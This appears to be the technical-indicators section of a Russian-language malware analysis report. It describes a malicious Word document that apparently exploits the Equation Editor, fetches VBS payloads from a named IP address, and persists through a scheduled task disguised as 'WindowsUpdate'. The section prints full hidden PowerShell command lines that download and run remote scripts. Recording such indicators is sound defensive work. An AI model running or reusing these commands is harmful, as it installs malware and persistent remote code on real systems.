Техническая информация
- '<SYSTEM32>\wscript.exe' "%TEMP%\IGUU.vbs"
- %TEMP%\iguu.vbs
- '23.##.239.89':80
- http://23.##.239.89/SSP/000000000000000%23%23%23%23%23%23%23%23%23%23%23%23%23%230000000000000000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300000000000%23%23%23%23%23%23%23%230.DOC
- http://23.##.239.89/520/IGUU.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o %WINDIR%\Temp\hkcmd.vbs; Start-Process powershell.exe %WINDIR%\Temp\hkcmd.vbs -...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"<SYSTEM32>\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o %WINDIR%\Temp\hkcmd.vbs; Start-Process powershell.exe %WINDIR%\Temp\hkcmd.vbs -...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' %WINDIR%\Temp\hkcmd.vbs